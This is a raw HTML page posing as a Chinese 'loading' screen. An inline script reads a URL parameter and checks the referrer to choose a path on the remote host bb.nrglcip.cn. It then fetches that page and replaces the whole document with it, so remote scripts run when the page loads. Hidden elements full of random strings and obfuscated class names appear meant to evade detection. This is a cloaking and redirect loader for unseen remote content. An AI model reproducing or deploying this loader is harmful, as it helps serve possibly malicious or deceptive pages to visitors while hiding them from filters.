<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .R74pyeV0Tu {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .R74pyeV0Tu .OZ3BOzSRe {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .R74pyeV0Tu .content {
            line-height: 50px;
            text-align: center
        }

        .R74pyeV0Tu .img {
            width: 100%
        }

        .R74pyeV0Tu .Nu17yof {
            text-align: center
        }

        .R74pyeV0Tu .Nu17yof span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .R74pyeV0Tu .Nu17yof span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .R74pyeV0Tu .Nu17yof span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .R74pyeV0Tu .Nu17yof span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .R74pyeV0Tu .Nu17yof span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .R74pyeV0Tu .Nu17yof span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .R74pyeV0Tu .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Yq8BBiKiawHU(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var uSfPj = Yq8BBiKiawHU('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ uSfPj +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ uSfPj +".html?a=share";
		}
		
        IR5mFpz=url+"#"+new Date().getTime();
        IR5mFpz && function() {
            $.get(IR5mFpz, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>UT1bF2v26w6GllxeqcvgM7wHDxQxPeIDgOyqnwpH2bQtiwCeX2Nompjgt5HKY7xij</p>
<li style='display:none' >Xt3wm6xjQc9tvxeyG0Fvhn5bgSESzlGOq2etnztit72dwJ7GyFrL5GMzp09StOBnmiFezFwSxOKiKBKqqImT6H1TVTvnw5Iqf</li>
<h1 style='display:none' >nvPzXngiMXjQMmzFwEs7mLvNhwWMFzrURET7X5Q5Wo2wdmz910</h1>
<b style='display:none' >rv0D1wZQTplHmc9snXyTQJaEwjQgVqIEXOW4UmyjUJB5g1p</b><div class="R74pyeV0Tu">
    <div class="OZ3BOzSRe">
        <div class="Nu17yof">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >FoGbXIsjCGY7jq9yoXepOuExjPx3b4UgG7rH9iy0b4OSYMZF6WZ9FvsBsOwwo</ul>
<h1 style='display:none' >ghk8d5bBaQVeg2KhfyNSpOaz</h1>
<div style='display:none'>ssjE631rrXRBtxTf</div>
<ul style='display:none' >FoGbXIsjCGY7jq9yoXepOuExjPx3b4UgG7rH9iy0b4OSYMZF6WZ9FvsBsOwwo</ul>
<b style='display:none' >S00k0mcQiBfo4comocfSidrUBQNzd3VHfuwvI7lUobozn1Q</b>
<div style='display:none'>ssjE631rrXRBtxTf</div>
<li style='display:none' >bXPGJUDWmwlOkmMVV8dw5PT9WfvCnJ33EgROusxSGV2lwCdrc2TF</li>
<a  href='#' style='display:none'>RF7JffL0AR3tXbFEkRifms6iRwZg86VD53k4UpT1TLpBJwHprgI</a>
<span style='display:none'>QAinImjyw47ZXuGSdS7QumlBkXvXL7b</span></body>
</html>